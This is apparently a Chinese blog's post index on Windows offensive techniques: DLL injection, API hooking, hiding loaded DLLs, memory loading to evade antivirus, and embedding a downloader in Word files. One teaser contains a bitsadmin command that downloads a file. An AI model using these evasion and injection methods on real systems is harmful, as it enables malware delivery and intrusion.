windows对抗常用
文章平均质量分 81
TK13
你在凝视深渊的时候 深渊也在凝视着你
展开
-
R3抹掉加载的DLL
R3抹掉加载的DLL 原理类似于获取Kernel32.dll加载地址,知道这个东西也是在看获取Kernel32.dll地址的时候在网上搜索学习资料,无意中看到的这个东西。这个挺有用,结合着HiJack的话效果会不错。思路是这样:FS--->TEB--->PEB--->PEB_LDR_DATA.InInitialzationOrderModuleList(细节偏...原创 2017-04-30 13:41:04 · 3845 阅读 · 0 评论 -
R3获取kernel32地址
获取Kernel32地址 如果是搞PE变形或者PE重构,再或者代码注入,很多时候我们要动态获取Loadlibrary()以及GetPeocAddress()两个函数的地址,通过这两个函数再动态获取其他函数地址,这样就可以免导入了。不然导入表里会暴露自己的调用。 对于静态PE文件重组来说,可以通过查看原有的PE文件是不是调用了这两个,或者加载了Kernell32.dll(通常都是...原创 2017-04-30 12:41:41 · 2849 阅读 · 0 评论 -
TLS实现代码段加密
TLS实现代码段加密原创 2017-01-01 20:29:35 · 4439 阅读 · 2 评论 -
HTTP自定义Header-(SOCKET-TCP)
HTTP自定义Header-TCP 前几天弄一些东西,需要在发送http请求的时候自定义http头,找了几个库用着很不爽。有的把Cookie直接干掉了,还自己在头里加了版权,最后终于忍不了了。在网上一把梭了一个TCP的,这个比较灵活,没有那么多事,THHP下面终归还是TCP:一把梭的代码如下:#include "HttpConnect.h"#ifdef WIN32#prag原创 2017-05-14 00:30:46 · 5874 阅读 · 0 评论 -
预防NSA勒索病毒攻击脚本
预防445端口勒索病毒修复脚本 直接复制下去,创建一个文件,名字随意后缀是.bat,然后双击就可以了。:+添加关键注册表以及停掉并且禁用计算机敏感服务echo off::netstat -anecho Yes | reg delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\NetBT\Parameters /v S原创 2017-05-14 01:46:20 · 6545 阅读 · 0 评论 -
HTTP1.0,1.1,2.0,HTTPS
HTTP1.0/1.1/2.0/HTTPS HTTP(超文本传输协议)是互联网上应用最为广泛的一种网络协议。所有的WWW文件都必须遵守这个标准。设计HTTP最初的目的是为了提供一种发布和接收HTML页面的方法。是用于从WWW服务器传输超文本到本地浏览器的传输协议。默认使用80端口,HTTP客户端发起一个请求,建立一个到服务器指定端口(默认是80端口)的TCP连接。HTTP协议和TCP协议...原创 2017-06-14 21:58:51 · 1322 阅读 · 0 评论 -
反弹代理环境的搭建
反弹代理环境的搭建 前几天工作无意中接触到这个,这个方案是同事提出来的,之前没用过反弹代里相关,没啥难度,基本的工具使用而已,整理下留个笔记方便以后查阅。这里涉及到的反向代理软件就直接用网上别人写好的,后期有时间在自己写代理软件相关,实现并不是有多难。到时候会更新到我的个人主页上,感兴趣的可以留意。 先说下概念,平时所说的代理其实就是正向,也就是找到一个公网服务器,挂上代理请求...原创 2017-06-10 19:07:03 · 2077 阅读 · 0 评论 -
Word 通过添加Package 实现word藏毒
这个思路要结合近期在一些安全网站上公布的姿势来实现,先科普几个地方。(1)通过cmd本身就可以直接下载:Bitsadmin /transfer AA /download /priority normal "http://..." "..."其实讲道理也可以直接调用Bitsadmin.exe 和cmd没关系。问题是刚刚我测试一发,返现woc 360竟然报毒了?然后我换了个姿势原创 2017-01-15 20:15:02 · 2487 阅读 · 0 评论 -
svchost服务(DLL服务)
svchost服务(DLL服务)原创 2016-10-07 21:05:31 · 9362 阅读 · 2 评论 -
Shellcode
Shellcode原创 2016-10-18 21:59:32 · 6859 阅读 · 0 评论 -
虚拟桌面模拟查找点击自绘控件
虚拟桌面模拟查找点击自绘控件原创 2016-10-24 20:26:28 · 1211 阅读 · 0 评论 -
通过修改EIP寄存器实现强行跳转并且注入DLL到目标进程里
通过修改EIP寄存器实现强行跳转并且注入DLL到目标进程里原创 2016-10-21 17:32:41 · 4540 阅读 · 0 评论 -
windows-CODE注入(远程线程注入)
远程线程注入原创 2016-08-14 17:25:05 · 6009 阅读 · 1 评论 -
AsSystemRum 系统提权工具 实现思路及其源码
AsSystemRum 系统提权工具 实现思路及其源码原创 2016-09-17 00:02:56 · 1535 阅读 · 0 评论 -
windows-API劫持(API-HOOK)
API劫持,windows-API劫持(API-HOOK)原创 2016-08-14 18:01:50 · 22548 阅读 · 0 评论 -
windows-DLL注入
DLL注入原创 2016-08-14 17:39:57 · 2321 阅读 · 0 评论 -
手动添加导入表修改EXE功能
手动添加导入表修改EXE功能原创 2016-10-30 15:35:34 · 6000 阅读 · 0 评论 -
DLL内存加载
动态加载dll功能: 把一个处于内存里的dll直接加载并且使用。用途: 免杀(静态文件查杀),外挂(防止游戏自己hook了loadlibrary等函数),以及其他。原理: 假设目前处于内存里的dll是A,然后开辟一个新的内存空间B,根据A的文件头等相关信息,把B看做是加载内存。然后把数据拷贝到B里,并且对齐相关节,然后修正iat等相关。然后在手动原创 2016-11-19 15:07:21 · 7028 阅读 · 0 评论 -
镜像劫持2
镜像劫持原创 2016-12-09 00:20:57 · 1888 阅读 · 0 评论 -
DLL注入-APC注入
DLL注入-APC注入原创 2016-11-25 18:13:30 · 5679 阅读 · 1 评论